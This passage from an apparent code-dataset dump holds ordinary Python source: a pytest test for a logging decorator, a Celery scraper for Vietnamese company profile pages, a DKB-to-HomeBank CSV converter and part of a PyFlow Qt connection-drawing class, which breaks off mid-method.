"line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 546, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 546, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 546, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 547, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 547, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 547, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 548, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 548, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 548, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 551, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 556, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 556, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 556, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 557, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 557, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 557, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 559, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 559, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 559, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 559, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 559, 
"usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 562, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 562, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 563, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 563, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 565, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 565, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 566, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 566, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 567, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 567, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 567, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 567, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 567, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 568, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 568, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 568, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 569, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 569, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 569, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 573, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 578, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 578, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 578, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 579, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 579, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 579, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 581, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 581, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 581, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 581, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 581, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 584, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 584, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 585, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 585, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 587, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 587, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 588, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 588, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 589, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 589, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 589, "usage_type": "attribute"}, {"api_name": 
"flask.ext.login.current_user.get_id", "line_number": 589, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 589, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 590, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 590, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 590, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 591, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 591, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 591, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 595, "usage_type": "call"}]} +{"seq_id": "25627561256", "text": "import logging\nfrom benchmarkstt.decorators import log_call\n\n\ndef test_log_call(caplog):\n logger = logging.getLogger()\n\n @log_call(logger, logging.WARNING)\n def test(*args, **kwargs):\n return 'result'\n\n test('arg1', arg2='someval')\n assert caplog.record_tuples == [\n ('root', logging.WARNING, \"test('arg1', arg2='someval')\")\n ]\n\n\ndef test_log_call2(caplog):\n logger = logging.getLogger('testname')\n caplog.set_level(logging.INFO)\n\n @log_call(logger, result=True, log_level=logging.INFO)\n def test(*args, **kwargs):\n return 'result'\n\n test(arg2='someval')\n assert caplog.record_tuples == [\n ('testname', logging.INFO, \"test(arg2='someval')\"),\n ('testname', logging.INFO, 'test returned: result')\n ]\n\n\ndef test_log_call3(caplog):\n logger = logging.getLogger('testname')\n caplog.set_level(logging.DEBUG)\n\n @log_call(logger)\n def funcname():\n return None\n\n funcname()\n assert caplog.record_tuples == [\n ('testname', logging.DEBUG, \"funcname()\"),\n ]\n", "repo_name": "ebu/benchmarkstt", "sub_path": "tests/benchmarkstt/test_decorators.py", "file_name": "test_decorators.py", "file_ext": "py", "file_size_in_byte": 1054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 51, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "benchmarkstt.decorators.log_call", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "benchmarkstt.decorators.log_call", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 29, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 35, "usage_type": "attribute"}, {"api_name": "benchmarkstt.decorators.log_call", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "9593509599", "text": "from celery import Celery\nfrom lxml import html\nimport json\nimport requests\nimport re\n\napp = Celery('worker', backend='rpc://', broker='amqp://')\n\n\n@app.task\ndef crawler(data):\n '''Request and parse data from company URL'''\n # Get raw page from url\n resp = requests.get(data['url'])\n resp.encoding = 'utf-8'\n\n 
# Parse element from raw page\n tree = html.fromstring(resp.text)\n text = tree.xpath(\"//p/strong[contains(text(), {})]/../following-sibling::table/tr\".format(data['ticker_symbol']))\n clean_text = [i.replace(\"\\n\", \"\").replace(\"\\t\", \"\") for i in text[0].xpath(\"td[1]/text()\")]\n name = clean_text[0]\n address = clean_text[1]\n phone1 = clean_text[2]\n international_phone1 = phone_num_parser(phone1)\n phone2 = clean_text[3]\n international_phone2 = phone_num_parser(phone2)\n email = clean_text[4]\n website = clean_text[5]\n business = clean_text[6].replace(\"Business: \", \"\")\n\n # Parse financial summary data\n financial_summary = {}\n summ = text[0].xpath(\"td[2]/table/tr\")\n for i in summ:\n key = i.xpath('td[1]/strong/text()')[0].replace(\":\", \"\").lower()\n try:\n val = i.xpath('td[2]/text()')[0]\n except IndexError:\n val = \"\"\n financial_summary.update({key: val})\n\n # Parse business summary data\n bs = str(text[1].xpath(\"td\")[0].text_content())\n bs = bs.replace(\"\\t\", \"\").replace(u\"\\xa0\", \"\")\n business_summary = re.search(r\"Business Summary:\\n(.*?)\\n\", bs).group(1)\n\n result = re.findall(r\"Auditing Company:\\n(.*?)Add|Auditing Company:\\n(.*?)Địa|Auditing Company:\\n(.*?)\\n\", bs)\n auditing_company = get_val(result)\n\n result = re.findall(r\"Address: (.*?)Tel|Địa chỉ: (.*?)Điện|Address: (.*?)\\n|Địa chỉ: (.*?)\\n\", bs)\n auditing_company_address = get_val(result)\n\n result = re.findall(r\"Tel: (.*?) -|Tel: (.*?) Fax|Điện thoại:(.*?) -|Điện thoại: (.*?) -|Điện thoại: (.*?) Fax|Điện thoại:(.*?) Fax\", bs)\n auditing_company_phone = get_val(result)\n\n result = re.findall(r\"Fax: (.*?) W|Fax: (.*?)W|Fax: (.*?)\\n\", bs)\n auditing_company_fax = get_val(result)\n\n result = re.findall(r\"Website: (.*?) -|Website: (.*?)\\n\", bs)\n auditing_company_web = get_val(result)\n\n result = re.findall(r\"Email: (.*?)\\n\", bs)\n auditing_company_email = result[0] if result else \"\"\n\n result = re.findall(r\"Established License: (.*?)\\n\", bs)\n established_license = result[0] if result else \"\"\n\n result = re.findall(r\"Business License: (.*?)\\n\", bs)\n business_license = result[0] if result else \"\"\n\n # Create company profile dict\n company_profile = {\n \"company name\": data[\"company_name\"],\n \"company_url\": data[\"url\"],\n \"ticker_symbol\": data[\"ticker_symbol\"],\n \"company street address\": address,\n \"country\": \"Vietnam\",\n \"company description\": business_summary,\n \"company phone number\": [phone1, phone2],\n \"business\": business,\n \"company website\": website,\n \"company email\": email,\n \"financial summary\": financial_summary,\n \"business registration\": {\n \"established licence\": established_license,\n \"business license\": business_license\n },\n \"auditing company\": {\n \"company_name\": auditing_company,\n \"address\": auditing_company_address,\n \"phone_number\": auditing_company_phone,\n \"email\": auditing_company_email,\n \"website\": auditing_company_web\n }\n }\n\n return company_profile\n\n\ndef get_val(result):\n '''pick the non-empty group from a findall result tuple'''\n val = ''\n if result:\n for i in result[0]:\n if i:\n val = i\n\n return val\n\n\ndef phone_num_parser(number):\n '''convert a local Vietnamese phone number to international +84 format'''\n list_number = re.findall(r\"\\d+\", number)\n clean_number = \"\".join(list_number)\n parsed_number = re.sub(r'^(?:0|84)', '+84', clean_number, 1)\n return parsed_number\n", "repo_name": "fahmifm/company_scraping", "sub_path": "scrape/worker.py", "file_name": "worker.py", "file_ext": "py", 
"file_size_in_byte": 3966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "celery.Celery", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 18, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 18, "usage_type": "name"}, {"api_name": "re.search", "line_number": 45, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 47, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 50, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 53, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 56, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 59, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 62, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 113, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 115, "usage_type": "call"}]}
+{"seq_id": "12432054094", "text": "#!/usr/bin/env python3\n\n# http://homebank.free.fr/help/06csvformat.html\n\nfrom decimal import Decimal\nfrom datetime import datetime\n\nPAYMODES = [\"None\", # 0\n\"Credit Card\", # 1\n\"Check\", # 2\n\"Cash\", # 3\n\"Transfer\", # 4\n\"Internal Transfer\", # 5\n\"Debit Card\", # 6\n\"Standing Order\", # 7\n\"Electronic Payment\", # 8\n\"Deposit\", # 9\n\"FI Fees\"] # 10\nPAYMODE_NONE = 0\nPAYMODE_CREDIT_CARD = 1\nPAYMODE_CASH = 3\nPAYMODE_INTERNAL_TRANSFER = 5\nPAYMODE_EINZUG = 8\nPAYMODE_FEE = 10\n\ndef split_line(line):\n\t\"\"\"returns a list of csv elements\"\"\"\n\t# it removes semicolons from the end of the line first\n\t# print(\"%r\" % line.strip(\";\").split(\";\"))\n\treturn list(map(lambda x:x.strip('\"'), line.strip(\";\\n\").split(\";\")))\n\ndef get_data(line, assert_type=None, convert=lambda x:x):\n\tcsv_type, value = split_line(line)\n\tif assert_type:\n\t\tassert csv_type == assert_type\n\treturn convert(value) \n\ndef to_string(value):\n\treturn value\n\ndef to_decimal(value):\n\tif \" \" in value:\n\t\tvalue, _ = value.split(\" \", 1)\n\treturn Decimal(value.replace(\",\", \".\"))\n\ndef to_date(value):\n\treturn datetime.strptime(value, \"%d.%m.%Y\")\n\ndef get_string_until(astr, break_chars=\" 1234567890,;.-\", valid_char=lambda x: True):\n\tret = []\n\tfor char in astr:\n\t\tif valid_char(char) and char not in break_chars:\n\t\t\tret.append(char)\n\t\telse:\n\t\t\tbreak\n\treturn \"\".join(ret)\n\ndef guess_paymode(payee, description, default=PAYMODE_NONE):\n\tif payee in (\"HVB\", \"STADTSPARKASSE\", \"AUSZAHLUNG\"):\n\t\treturn PAYMODE_INTERNAL_TRANSFER\n\tif payee == \"DKB\":\n\t\treturn PAYMODE_FEE\n\treturn default\n\ndef guess_payee(description):\n\tname = get_string_until(description)\n\tif name == \"\":\n\t\treturn \"DKB\"\n\n\treturn name.upper()\n\ndef guess_category(payee, description, last_category=\"\"):\n\tif payee == \"WEBFACTION\":\n\t\treturn \"Homepage:webfaction\"\n\tif payee == \"GH\":\n\t\treturn \"Homepage:github\"\n\telif payee == \"DB\":\n\t\treturn \"Travel:Train\"\n\telif payee == \"GOOGLE\":\n\t\tif \"Music\" in description:\n\t\t\treturn \"Multimedia:Music\"\n\telif payee == \"HABENZINSENZ\":\n\t\treturn \"Zins\"\n\telif payee == \"DKB\":\n\t\tif \"für Auslandseinsatz\" in description:\n\t\t\treturn last_category or \"Transaction 
Fee\"\n\telif \"HUMBLE\" in payee:\n\t\treturn \"hobby:games\"\n\treturn \"\"\n\n\n\ndef convert_csv(csv_filename):\n\tcsv_fh = open(csv_filename, encoding=\"latin-1\")\n\taccount_type, account_info = split_line(csv_fh.readline())\n\n\tit = get_transactions_visadkb(csv_fh)\n\tvon, bis = next(it)\n\tfn = \"dkbvisa_%s-%s.csv\" % (von.strftime(\"%y%m%d\"), bis.strftime(\"%y%m%d\"))\n\twith open(fn, \"w\") as fh:\n\t\t# fh.write(Transaction.csv_head)\n\t\tfor transaction in it:\n\t\t\tfh.write(transaction.to_csv())\n\nclass Transaction(object):\n\tcsv_head = \"date;paymode;info;payee;description;amount;category\\n\"\n\tdef __init__(self, date, amount, **kw):\n\t\t#date ; paymode ; info ; payee ; description ; amount ; category\n\t\tself.date = date\n\t\tself.paymode = kw.get('paymode', PAYMODE_NONE)\n\t\tself.info = kw.get('info', \"\")\n\t\tself.payee = kw.get('payee', \"Unknown\")\n\t\tself.description = kw.get('description', \"\")\n\t\tself.amount = amount\n\t\tself.category = kw.get('category', \"\")\n\n\n\tdef get_csv_date(self):\n\t\treturn self.date.strftime(\"%d-%m-%y\")\n\tdef get_csv_paymode(self):\n\t\treturn str(self.paymode)\n\tdef get_csv_info(self):\n\t\treturn self.info\n\tdef get_csv_payee(self):\n\t\treturn self.payee\n\tdef get_csv_description(self):\n\t\treturn self.description\n\tdef get_csv_amount(self):\n\t\treturn \"%.2f\" % self.amount\n\tdef get_csv_category(self):\n\t\treturn self.category\n\tdef to_csv(self):\n\t\tdata = [\"date\", \"paymode\", \"info\", \"payee\", \"description\", \"amount\", \"category\"]\n\t\treturn \"%s\\n\" % \";\".join(map(lambda x: getattr(self, \"get_csv_%s\" % x)(), data))\n\n# 1 \"Kreditkarte:\";\"4998************ Kreditkarte\";\n# 2\n# 3 \"Von:\";\"27.12.2012\";\n# 4 \"Bis:\";\"04.01.2013\";\n# 5 \"Saldo:\";\"11266.89 EUR\";\n# 6 \"Datum:\";\"04.01.2013\";\n# 7 \n# 8 \"Umsatz abgerechnet\";\"Wertstellung\";\"Belegdatum\";\"Umsatzbeschreibung\";\"Betrag (EUR)\";\"Ursprünglicher Betrag\";\n# 9 \"Nein\";\"04.01.2013\";\"03.01.2013\";\"Amazon EUAMAZON.DE\";\"-27,77\";\"\";\nVISA_DESC = '\"Umsatz abgerechnet\";\"Wertstellung\";\"Belegdatum\";\"Umsatzbeschreibung\";\"Betrag (EUR)\";\"Ursprünglicher Betrag\";\\n'\ndef get_transactions_visadkb(csv_fh):\n\tassert csv_fh.readline() == '\\n'\n\tvon = get_data(csv_fh.readline(), assert_type=\"Von:\", convert=to_date)\n\tbis = get_data(csv_fh.readline(), assert_type=\"Bis:\", convert=to_date)\n\tsaldo = get_data(csv_fh.readline(), assert_type=\"Saldo:\")\n\tdatum = get_data(csv_fh.readline(), assert_type=\"Datum:\")\n\tassert csv_fh.readline() == '\\n'\n\tvisa_desc = csv_fh.readline()\n\tassert visa_desc == VISA_DESC, \"\\n%r\\n%r\" % (visa_desc, VISA_DESC)\n\n\tyield (von, bis)\n\tlast_category = \"\"\n\tfor line in csv_fh:\n\t\twertstellung, beschreibung, betrag = get_dkbvisa_transaction(line)\n\t\tpayee = guess_payee(beschreibung)\n\t\tcategory = guess_category(payee, beschreibung, last_category=last_category)\n\t\tpaymode = guess_paymode(payee, beschreibung, default=PAYMODE_CREDIT_CARD)\n\t\tt = Transaction(date=wertstellung, amount=betrag, description=beschreibung,\n\t\t\tpayee=payee, category=category, paymode=paymode)\n\t\tyield t\n\t\tlast_category = category or last_category  # remember the last real category so FX-fee rows can inherit it\n\t\t#print(t.to_csv())\n\ndef get_dkbvisa_transaction(line):\n\tconvert_l = [to_date, to_string, to_decimal]\n\t_, wertstellung, _, beschreibung, betrag, urspruenglich = split_line(line)\n\tif urspruenglich:\n\t\tbeschreibung += \" ursprünglich %s\" % urspruenglich\n\treturn list(map(lambda x:x[0](x[1]), zip(convert_l, [wertstellung, beschreibung, 
betrag])))\n\n\n# 1 \"Kontonummer:\";\"12774055 / Internet-Konto\";\n# 2\n# 3 \"Von:\";\"27.12.2012\";\n# 4 \"Bis:\";\"04.01.2013\";\n# 5 \"Kontostand vom:\";\"500,00\";\n# 6\n# 7 \"Buchungstag\";\"Wertstellung\";\"Buchungstext\";\"Auftraggeber/Begünstigter\";\"Verwendungszweck\";\"Kontonummer\";\"BLZ\";\"Betrag (EUR)\";\n# 8 \"04.01.2013\";\"04.01.2013\";\"LASTSCHRIFT\";\"AZ REAL ESTATE GERMANY\";\"X X 01.01.13-31.01.13-GM WOHNEN 01.01.13-31.01.13-VZ BK 01.01.13-31.01.13-VZ HK X \";\"905001200\";\"60080000\";\"-1.091,00\";\n\n\n# Column list:\n# date ; paymode ; info ; payee ; description ; amount ; category\n\n# Values:\n# date => format should be DD-MM-YY\n# mode => from 0=none to 10=FI fee\n# info => a string\n# payee => a payee name\n# description => a string\n# amount => a number with a '.' as decimal separator, ex: -24.12 or 36.75\n# category => a full category name (category, or category:subcategory)\n\nif __name__ == \"__main__\":\n\tconvert_csv(\"import/4998____________.csv\")", "repo_name": "hwmrocker/dkbcsv2homebank", "sub_path": "csvc.py", "file_name": "csvc.py", "file_ext": "py", "file_size_in_byte": 6416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "decimal.Decimal", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "13208813106", "text": "import weakref\nfrom uuid import UUID, uuid4\n\nfrom Qt import QtCore\nfrom Qt import QtGui\nfrom Qt.QtWidgets import QGraphicsPathItem\nfrom Qt.QtWidgets import QGraphicsEllipseItem\nfrom Qt.QtWidgets import QMenu\nfrom Qt.QtWidgets import QStyle\n\nfrom PyFlow.UI.Utils.stylesheet import editableStyleSheet, Colors, ConnectionTypes\nfrom PyFlow.UI.Canvas.UICommon import NodeDefaults\nfrom PyFlow.UI.Canvas.Painters import ConnectionPainter\nfrom PyFlow.Core.Common import *\n\n\n\n# UIConnection between pins\nclass UIConnection(QGraphicsPathItem):\n \"\"\"UIConnection is a cubic spline curve. 
It represents connection between two pins.\n \"\"\"\n def __init__(self, source, destination, canvas):\n QGraphicsPathItem.__init__(self)\n self.setAcceptedMouseButtons(QtCore.Qt.LeftButton)\n self.setAcceptHoverEvents(True)\n self.setFlag(QGraphicsPathItem.ItemIsSelectable)\n self._menu = QMenu()\n self.actionDisconnect = self._menu.addAction(\"Disconnect\")\n self.actionDisconnect.triggered.connect(self.kill)\n self._uid = uuid4()\n self.canvasRef = weakref.ref(canvas)\n self.source = weakref.ref(source)\n self.destination = weakref.ref(destination)\n self.drawSource = self.source()\n self.drawDestination = self.destination()\n\n # Overrides for getting endpoints positions\n # if None - pin centers will be used\n self.sourcePositionOverride = None\n self.destinationPositionOverride = None\n\n self.mPath = QtGui.QPainterPath()\n\n self.cp1 = QtCore.QPointF(0.0, 0.0)\n self.cp2 = QtCore.QPointF(0.0, 0.0)\n\n self.setZValue(NodeDefaults().Z_LAYER - 1)\n\n self.color = self.source().color()\n self.selectedColor = self.color.lighter(150)\n\n self.thickness = 1\n self.thicknessMultiplier = 1\n if source.isExec():\n self.thickness = 2\n\n self.pen = QtGui.QPen(self.color, self.thickness, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n\n points = self.getEndPoints()\n self.updateCurve(points[0], points[1])\n\n self.setPen(self.pen)\n\n self.source().update()\n self.destination().update()\n self.fade = 0.0\n self.source().uiConnectionList.append(self)\n self.destination().uiConnectionList.append(self)\n self.source().pinConnected(self.destination())\n self.destination().pinConnected(self.source())\n self.prevPos = None\n self.linPath = None\n self.hOffsetL = 0.0\n self.hOffsetR = 0.0\n self.hOffsetLSShape = 0.0\n self.hOffsetRSShape = 0.0\n self.vOffset = 0.0\n self.vOffsetSShape = 0.0\n self.offsetting = 0\n self.snapVToFirst = True\n self.snapVToSecond = False\n self.sShape = False\n self.sameSide = 0\n self.hoverSegment = -1\n self.pressedSegment = -1\n if self.source().isExec():\n self.bubble = QGraphicsEllipseItem(-2.5, -2.5, 5, 5, self)\n self.bubble.setBrush(self.color)\n self.bubble.setPen(self.pen)\n\n point = self.mPath.pointAtPercent(0.0)\n self.bubble.setPos(point)\n\n self.bubble.hide()\n self.source()._rawPin.onExecute.connect(self.performEvaluationFeedback)\n self.shouldAnimate = False\n self.timeline = QtCore.QTimeLine(2000)\n self.timeline.setFrameRange(0, 100)\n self.timeline.frameChanged.connect(self.timelineFrameChanged)\n self.timeline.setLoopCount(0)\n\n def performEvaluationFeedback(self, *args, **kwargs):\n if self.timeline.state() == QtCore.QTimeLine.State.NotRunning:\n self.shouldAnimate = True\n # spawn bubble\n self.bubble.show()\n self.timeline.start()\n\n def timelineFrameChanged(self, frameNum):\n percentage = currentProcessorTime() - self.source()._rawPin.getLastExecutionTime()\n self.shouldAnimate = percentage < 0.5\n point = self.mPath.pointAtPercent(float(frameNum) / float(self.timeline.endFrame()))\n self.bubble.setPos(point)\n if not self.shouldAnimate:\n self.timeline.stop()\n self.bubble.hide()\n\n def setSelected(self, value):\n super(UIConnection, self).setSelected(value)\n\n def isUnderCollapsedComment(self):\n srcNode = self.source().owningNode()\n dstNode = self.destination().owningNode()\n srcComment = srcNode.owningCommentNode\n dstComment = dstNode.owningCommentNode\n if srcComment is not None and dstComment is not None and srcComment == dstComment and srcComment.collapsed:\n return True\n return False\n\n def 
isUnderActiveGraph(self):\n return self.canvasRef().graphManager.activeGraph() == self.source()._rawPin.owningNode().graph()\n\n def __repr__(self):\n return \"{0} -> {1}\".format(self.source().getFullName(), self.destination().getFullName())\n\n def setColor(self, color):\n self.pen.setColor(color)\n self.color = color\n\n def updateEndpointsPositions(self):\n srcNode = self.source().owningNode()\n dstNode = self.destination().owningNode()\n\n srcComment = srcNode.owningCommentNode\n if srcComment is not None:\n # if comment is collapsed or under another comment, move point to top most collapsed comment's right side\n srcNodeUnderCollapsedComment = srcComment.isUnderCollapsedComment()\n topMostCollapsedComment = srcNode.getTopMostOwningCollapsedComment()\n if srcComment.collapsed:\n rightSideEndpointGetter = srcComment.getRightSideEdgesPoint\n if srcNodeUnderCollapsedComment:\n rightSideEndpointGetter = topMostCollapsedComment.getRightSideEdgesPoint\n self.sourcePositionOverride = rightSideEndpointGetter\n else:\n if srcNodeUnderCollapsedComment:\n self.sourcePositionOverride = topMostCollapsedComment.getRightSideEdgesPoint\n else:\n self.sourcePositionOverride = None\n else:\n # if no comment return source point back to pin\n self.sourcePositionOverride = None\n\n # Same for right hand side\n dstComment = dstNode.owningCommentNode\n if dstComment is not None:\n dstNodeUnderCollapsedComment = dstComment.isUnderCollapsedComment()\n topMostCollapsedComment = dstNode.getTopMostOwningCollapsedComment()\n if dstComment.collapsed:\n rightSideEndpointGetter = dstComment.getLeftSideEdgesPoint\n if dstNodeUnderCollapsedComment:\n rightSideEndpointGetter = topMostCollapsedComment.getLeftSideEdgesPoint\n self.destinationPositionOverride = rightSideEndpointGetter\n else:\n if dstNodeUnderCollapsedComment:\n self.destinationPositionOverride = topMostCollapsedComment.getLeftSideEdgesPoint\n else:\n self.destinationPositionOverride = None\n else:\n self.destinationPositionOverride = None\n\n def Tick(self):\n # check if this instance represents existing connection\n # if not - destroy\n if not arePinsConnected(self.source()._rawPin, self.destination()._rawPin):\n self.canvasRef().removeConnection(self)\n\n if self.drawSource.isExec() or self.drawDestination.isExec():\n if self.thickness != 2:\n self.thickness = 2\n self.pen.setWidthF(self.thickness)\n\n if self.isSelected():\n self.pen.setColor(self.selectedColor)\n else:\n self.pen.setColor(self.color)\n self.update()\n\n def contextMenuEvent(self, event):\n self._menu.exec_(event.screenPos())\n\n @property\n def uid(self):\n return self._uid\n\n @uid.setter\n def uid(self, value):\n if self._uid in self.canvasRef().connections:\n self.canvasRef().connections[value] = self.canvasRef().connections.pop(self._uid)\n self._uid = value\n\n def applyJsonData(self, data):\n hOffsetL = data['hOffsetL']\n if hOffsetL is not None:\n self.hOffsetL = float(hOffsetL)\n hOffsetR = data['hOffsetR']\n if hOffsetR is not None:\n self.hOffsetR = float(hOffsetR)\n hOffsetLSShape = data['hOffsetLSShape']\n if hOffsetLSShape is not None:\n self.hOffsetLSShape = float(hOffsetLSShape)\n hOffsetRSShape = data['hOffsetRSShape']\n if hOffsetRSShape is not None:\n self.hOffsetRSShape = float(hOffsetRSShape)\n vOffset = data['vOffset']\n if vOffset is not None:\n self.vOffset = float(vOffset)\n vOffsetSShape = data['vOffsetSShape']\n if vOffsetSShape is not None:\n self.vOffsetSShape = float(vOffsetSShape)\n snapVToFirst = data['snapVToFirst']\n if snapVToFirst is not None:\n 
self.snapVToFirst = bool(snapVToFirst)\n snapVToSecond = data['snapVToSecond']\n if snapVToSecond is not None:\n self.snapVToSecond = bool(snapVToSecond)\n\n self.getEndPoints()\n\n def serialize(self):\n script = {'sourceUUID': str(self.source().uid),\n 'destinationUUID': str(self.destination().uid),\n 'sourceName': self.source()._rawPin.getFullName(),\n 'destinationName': self.destination()._rawPin.getFullName(),\n 'uuid': str(self.uid),\n 'hOffsetL': str(self.hOffsetL),\n 'hOffsetR': str(self.hOffsetR),\n 'hOffsetLSShape': str(self.hOffsetLSShape),\n 'hOffsetRSShape': str(self.hOffsetRSShape),\n 'vOffset': str(self.vOffset),\n 'vOffsetSShape': str(self.vOffsetSShape),\n 'snapVToFirst': int(self.snapVToFirst),\n 'snapVToSecond': int(self.snapVToSecond),\n }\n\n return script\n\n def __str__(self):\n return '{0} >>> {1}'.format(self.source()._rawPin.getFullName(), self.destination()._rawPin.getFullName())\n\n def drawThick(self):\n self.pen.setWidthF(self.thickness + (self.thickness / 1.5))\n f = 0.5\n r = abs(lerp(self.color.red(), Colors.Yellow.red(), clamp(f, 0, 1)))\n g = abs(lerp(self.color.green(), Colors.Yellow.green(), clamp(f, 0, 1)))\n b = abs(lerp(self.color.blue(), Colors.Yellow.blue(), clamp(f, 0, 1)))\n self.pen.setColor(QtGui.QColor.fromRgb(r, g, b))\n\n def restoreThick(self):\n self.pen.setWidthF(self.thickness)\n self.pen.setColor(self.color)\n\n def hoverEnterEvent(self, event):\n super(UIConnection, self).hoverEnterEvent(event)\n self.drawThick()\n self.update()\n\n def hoverLeaveEvent(self, event):\n super(UIConnection, self).hoverLeaveEvent(event)\n self.hoverSegment = -1\n self.restoreThick()\n self.update()\n\n def hoverMoveEvent(self, event):\n if self.offsetting == 0:\n 